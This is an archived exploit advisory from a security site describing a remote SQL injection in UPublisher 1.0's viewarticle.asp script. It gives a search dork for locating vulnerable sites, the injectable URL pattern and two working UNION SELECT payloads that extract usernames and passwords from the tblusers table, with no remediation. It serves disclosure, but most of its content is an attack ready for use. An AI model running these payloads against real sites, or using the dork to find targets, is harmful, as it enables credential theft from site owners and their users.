upublisher-10.txt

2006-11-14T00:00:00
ID PACKETSTORM:52010
Type packetstorm
Reporter ajann
Modified 2006-11-14T00:00:00

Description

                                        
                                            `*******************************************************************************  
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability  
# Author : ajann  
# Dork : UPublisher  
  
  
*******************************************************************************  
  
###http://[target]/[path]//viewarticle.asp?ID=[SQL]  
  
Example:   
  
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers  
OR ---  
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers  
  
"""""""""""""""""""""  
# ajann,Turkey  
# ...  
  
# Im not Hacker!  
`